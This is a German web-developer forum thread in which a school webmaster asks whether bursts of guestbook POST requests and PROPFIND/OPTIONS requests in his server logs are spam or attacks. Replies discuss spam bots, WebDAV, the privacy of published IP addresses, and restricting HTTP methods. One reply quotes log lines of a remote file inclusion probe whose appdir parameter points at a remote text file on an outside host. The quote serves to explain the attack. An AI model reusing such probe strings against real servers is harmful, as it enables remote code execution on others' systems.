Felix Riesterer: SPAM? Oder Angriff?

Liebe Mitleser,

heute war ich einmal neugierig und habe in die Server-Logs der Schulwebsite geschaut, die ich betreue. Oh Schreck! Alleine am gestrigen Samstag waren sehr viele POST-Zugriffe auf das Gästebuch verzeichnet. Und hinterlassen haben sie anscheinend nix, denn im GB sind keine neuen Einträge verzeichnet. Ich werde ja auch per Mail benachrichtigt, wenn jemand im GB etwas eingetragen hat.

Ich habe einmal die nicht-GET-Zugriffe vom 14.02.2009 hochgeladen: gb-posts-2009-02-14.txt (202kb)

Angesichts dieses enormen POST-Aufkommens bin ich schon sehr zufrieden, dass mein GB-Script so brav all diesen Schrott abweist. Aber was mich wundert, sind die HTTP-Requests, die weder GET noch POST sind. Darunter fand ich folgende, die mir nicht unmittelbar einleuchten:

* HEAD (ist OK)
* OPTIONS (ist mir nicht nachvollziehbar)
* PROPFIND

HEAD und OPTIONS stehen ja im RFC2616 definiert, daher beunruhigen sie mich nicht. Aber dieser PROPFIND ist mir nicht geheuer. Erste Google-Treffer suggerieren, dass das Teil anscheinend mit einem Subversion-System zu tun hat. Sowas gibt es auf unserer Schulwebsite natürlich nicht...

Muss ich mir nun ernste Gedanken über Angriffe machen?

Verzeichnen andere in ihren Logs auch ein solches POST-Aufkommen auf ihre Gästebücher innerhalb von 24 Stunden?

Liebe Grüße,

Felix Riesterer.

--
ie:% br:> fl:| va:) ls:[ fo:) rl:° n4:? de:> ss:| ch:? js:) mo:} zu:)
  1. Hi Felix,

    Ich habe einmal die nicht-GET-Zugriffe vom 14.02.2009 hochgeladen: gb-posts-2009-02-14.txt (202kb)

    Kleiner Tipp, ich glaube, das solltest du schleunigst entfernen. Nicht jeder hat eine wechselnde IP.

    Muss ich mir nun ernste Gedanken über Angriffe machen?

    Muss man leider immer.

    Verzeichnen andere in ihren Logs auch ein solches POST-Aufkommen auf ihre Gästebücher innerhalb von 24 Stunden?

    Gästebücher habe ich nicht und ungewollte POST Anfragen sind viele vorhanden, aber meine Scripts sind gut geschützt, was den Serverschutz betrifft kenne ich mich leider nicht gut genug aus. Bisher ist Rom noch nicht gefallen;-)

    Mike

    1. Lieber Mike,

      danke für Deine Antwort.

      Kleiner Tipp, ich glaube, das solltest du schleunigst entfernen. Nicht jeder hat eine wechselnde IP.

      Ich verstehe den Gedanken hinter Deinem Ratschlag nicht... Magst Du mir das erklären?

      Liebe Grüße,

      Felix Riesterer.

      --
      ie:% br:> fl:| va:) ls:[ fo:) rl:° n4:? de:> ss:| ch:? js:) mo:} zu:)
      1. Hi,

        Ich verstehe den Gedanken hinter Deinem Ratschlag nicht... Magst Du mir das erklären?

        klar, du veröffentlichst doch IP-Adressen, wobei ich nicht mal weiss ob das erlaubt ist, aber bei festen IP-Adressen ist das sozusagen eine persönliche Adresse und das müsste doch schon in den Bereich Datenmissbrauch fallen. Aber kann auch sein, dass ich total falsch liege, dann korrigiere mich bitte.

        Mike

        1. Lieber Mike,

          klar, du veröffentlichst doch IP-Adressen, wobei ich nicht mal weiss ob das erlaubt ist

          interessanter Gedanke. Soweit ich weiß, weiß ich nicht, wer hinter den IP-Adressen steckt. Da aber ein Zeitpunkt mit angegeben ist, wäre es möglich, damit Identitäten zu ermitteln... wenn man ein ISP ist, oder wenn man von einer Staatsanwaltschaft eine Erlaubnis hat, die betreffenden ISPs um Herausgabe dieser Informationen zu fordern.

          Sogesehen haben die IPs keinen direkten informationellen Wert, und schon garnicht verletzen Sie irgendwessen Persönlichkeitsrecht. Oder liege ich nun falsch?

          aber bei festen IP-Adressen ist das sozusagen eine persönliche Adresse und das müsste doch schon in den Bereich Datenmissbrauch fallen.

          Wieso? Wo steht denn, welche feste IP-Adresse zu welcher Person zuzuordnen ist? Wo steht außerdem, welche der IP-Adressen eine feste ist?

          Aber kann auch sein, dass ich total falsch liege, dann korrigiere mich bitte.

          Ich bin mir selbst nicht mehr so sicher. Darum mag vielleicht jemand antworten, der das besser weiß als ich.

          Liebe Grüße,

          Felix Riesterer.

          --
          ie:% br:> fl:| va:) ls:[ fo:) rl:° n4:? de:> ss:| ch:? js:) mo:} zu:)
          1. echo $begrüßung;

            Wieso? Wo steht denn, welche feste IP-Adresse zu welcher Person zuzuordnen ist? Wo steht außerdem, welche der IP-Adressen eine feste ist?

            Welche IP-Adresse direkt an wen zugeordnet ist, steht in einer Datenbank, die unter anderem beim RIPE einsehbar ist. IP-Adressen werden ja auf ähnliche Weise wie Domains vergeben und verwaltet. An wen der direkte Eigentümer sie weiterreicht, ist jedoch (normalerweise) nicht öffentlich einsehbar.

            echo "$verabschiedung $name";

          2. Hallo Felix,

            Wo steht außerdem, welche der IP-Adressen eine feste ist?

            die erste mit 92 beginnende Adresse dürfte eine statische IP-Adresse aus dem Bereich der moldavischen Telekom sein, wie ein einfaches nslookup an einer Windows-Kommandozeile vermuten läßt:

            $p>nslookup 92.xxx.yyy.zz
               Server:  UnKnown
               Address:  192.168.2.1

            Name:    host-static-92-xxx-yyy-zz.moldtelecom.md
               Address:  92.xxx.yyy.zz

            192.168.2.1 ist mein eigener Nameserver, der meinen Leichtsinnsbeitrag bestimmt nicht lange überleben wird.

            Freundliche Grüße

            Vinzenz

        2. Hallo,

          klar, du veröffentlichst doch IP-Adressen, wobei ich nicht mal weiss ob das erlaubt ist, aber bei festen IP-Adressen ist das sozusagen eine persönliche Adresse und das müsste doch schon in den Bereich Datenmissbrauch fallen. Aber kann auch sein, dass ich total falsch liege, dann korrigiere mich bitte.

          meiner Meinung nach fällt dies genauso wenig unter Datenmissbrauch wie eine Realtime Blackhole List. Die Visitenkarte, die mir jemand ungefragt am Auto hinterläßt, darf ich meiner Meinung nach mit dem gleichen Recht veröffentlichen, wie die IP-Adresse, unter der versucht wird, eine Webpräsenz zu bespammen oder zu hacken.

          Ich glaube, dass durch die Veröffentlichung viel eher Datenmissbrauch verhindert wird.

          Freundliche Grüße

          Vinzenz

      2. hi $name,

        Lieber Mike,

        danke für Deine Antwort.

        | Kleiner Tipp, ich glaube, das solltest du schleunigst entfernen. Nicht jeder hat eine wechselnde IP.

        Ich verstehe den Gedanken hinter Deinem Ratschlag nicht... Magst Du mir das erklären?

        In der Regel benutzt Spammie ja nicht seine eigene Internet Verbindung sondern ein Bot Netzwerk, sprich die IPs gehöhren den Opfern.

        gruss
        shadow

        --
        Vor dem Parser und auf hoher See sind wir allein in Gottes Hand
  2. Hallo Felix!

    Alleine am gestrigen Samstag waren sehr viele POST-Zugriffe auf das Gästebuch verzeichnet.
    Ich habe einmal die nicht-GET-Zugriffe vom 14.02.2009 hochgeladen: gb-posts-2009-02-14.txt (202kb)

    Um Deine Frage im Titel zu beantworten: Das sind SPAM-Versuche. Bei mir haben sie in letzter Zeit nachgelassen, gestern war z.B. Ruhe an der Front (insgesamt 30 Zeilen mit POST, davon waren 10 von mir, da ich an einem Script was angepasst habe und dann natürlich getestet).

    Als ANGRIFF-Versuche werte ich eher sowas:

    07:16:16 GET /temp/compare.html//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://xumy.fileave.com/id.txt???? 301 -
    07:16:16 GET /temp//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://xumy.fileave.com/id.txt???? 301 -
    07:16:16 GET //temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://xumy.fileave.com/id.txt???? 404 -
    07:16:16 GET /old_temp/compare.html//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://xumy.fileave.com/id.txt???? 301 -
    07:16:16 GET /old_temp//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://xumy.fileave.com/id.txt???? 404 -
    07:16:17 GET /old_news/compare.html//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://xumy.fileave.com/id.txt???? 404 -

    User-Agent: libwww-perl/5.813

    Angesichts dieses enormen POST-Aufkommens bin ich schon sehr zufrieden, dass mein GB-Script so brav all diesen Schrott abweist.

    Meiner auch ;)

    Verzeichnen andere in ihren Logs auch ein solches POST-Aufkommen auf ihre Gästebücher innerhalb von 24 Stunden?

    Wie schon gesagt, bei mir ist es weniger geworden. Kann sich aber wieder ändern :(

    Viele Grüße aus Frankfurt/Main,
    Patrick

    --
    _ - jenseits vom delirium - _

       Diblom   [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
    J'ai 10 ans! | Achtung Agentur! | Nichts ist unmöglich? Doch! | Heute schon gegökt?
  3. Ich habe einmal die nicht-GET-Zugriffe vom 14.02.2009 hochgeladen: gb-posts-2009-02-14.txt (202kb)

    Wenn die Requests zunehmen, würde ich mal die URL des Gästebuchs ändern (falls das möglich ist).
    Hintergedanke: Einen 410 Auszuliefern ist weit performater...

    mfg Beat

    --
    ><o(((°>           ><o(((°>
       <°)))o><                     ><o(((°>o
  4. Hallo Felix,

    Aber dieser PROPFIND ist mir nicht geheuer.

    Das HTTP-Verb PROPFIND entstammt der HTTP Erweiterung WebDAV und wird dort genutzt, um Informationen über WebDAV-Ressourcen herauszustellen. Da man sich WebDAV gut als über HTTP benutzbares Dateisystem vorstellen kann, wäre ls (1) eine Analogie zu PROPFIND.

    Erste Google-Treffer suggerieren, dass das Teil anscheinend mit einem Subversion-System zu tun hat. Sowas gibt es auf unserer Schulwebsite natürlich nicht...

    Subversion hat eine Möglichkeit, das Repository über WebDAV und damit übers Web Klienten zur Verfügung zu stellen. Dabei erweitert SVN die Erweiterung WebDAV noch ein weiteres Mal.

    Muss ich mir nun ernste Gedanken über Angriffe machen?

    Alles ist ein potentieller Angriff. ;)

    Sieh es mal so: Es ist sehr viel einfacher, einfach alle unbekannten HTTP-Verben mit HTTP 405 zu beantworten, anstatt sich um jeden einzelnen Request zu kümmern. Was der Bauer nicht versteht, frisst er dann einfach nicht. Ansonsten landet man in einem sich ständig erweiternden Irrenhaus. Und irgendwann kommt dann ein Spaßvogel (= Ich) vorbei und sendet diesen Request:

    KAFFEETRINKEN /html/kontakt/gaestebuch/ HTTP/1.1
      Host: www.peutinger-gymnasium.de

    Dein Gästebuch antwortet darauf wie auf einen GET. Du könntest das nun so lassen, weil GET die Normal-Antwort ist. Oder aber Du könntest nur noch auf GET & POST (und HEAD und OPTIONS) reagieren und das entweder im PHP-Code überprüfen oder die an Dein Skript weitergeleiteten HTTP-Anfragen mittels Apaches <Limit(Except)> limitieren. Hauptsache, Du kriegst den Kopf frei für die wild im Netz rumfliegenden Anfragen, die tatsächlich zu einer möglicherweise ungewollten Änderungen auf dem Server führen können, sprich POST bei Dir (und GET & Konsorten, wenn da ein Problem im Skript sein sollte).

    Tim

    1. Moin!

      Und irgendwann kommt dann ein Spaßvogel (= Ich) vorbei und sendet diesen Request:

      KAFFEETRINKEN /html/kontakt/gaestebuch/ HTTP/1.1
        Host: www.peutinger-gymnasium.de

      HTCPCP (Hyper Text Coffee Pot Control Protocol)

      :-)

      - Sven Rautenberg

      1. Hallo,

        HTCPCP (Hyper Text Coffee Pot Control Protocol)

        Ganz schlimmes Design. HTCPCPs GET ist im Gegensatz zu HTTP nicht idempotent; es sei denn man schaltet einen Jesus Cache davor. ;)

        Tim

        1. Tach,

          Ganz schlimmes Design. HTCPCPs GET ist im Gegensatz zu HTTP nicht idempotent; es sei denn man schaltet einen Jesus Cache davor. ;)

          ob nun Wasser in Kaffee zu verwandeln immer noch als Wunder durchgehen würde?

          mfg
          Woodfighter

          1. Hi,

            ob nun Wasser in Kaffee zu verwandeln immer noch als Wunder durchgehen würde?

            Wenn daraus Kopi Luwak wird und die Menschen das freiwillig trinken, dann ist das schon irgendwie ein Wunder;-)

            1 | 2

            Peter

  5. Guten Tag,

    Muss ich mir nun ernste Gedanken über Angriffe machen?

    Das solltes du unabhängig vom konkreten Fall immer.

    Verzeichnen andere in ihren Logs auch ein solches POST-Aufkommen auf ihre
    Gästebücher innerhalb von 24 Stunden?

    Grundrauschen. Wenn dich interessiert, was da wirklich passiert, speichere doch mal, was die so per POST schicken. Würde mich nicht wundern, wenn es hauptsächlich Versuche sind, Werbung in deinem Gästebuch zu platzieren.

    Gruß
    Christoph Jeschke

    --
    Zend Certified Engineer
    Certified Urchin Admin
  6. hi Felix,

    das ist zwar noch weit weg von einer DoS-Attack, aber ich würde das Gästebuch mal umbenennen.

    PROPFIND ist eine Methode zu WebDav.

    Hotte

    --
    Wenn der Kommentar nicht zum Code passt, kann auch der Code falsch sein.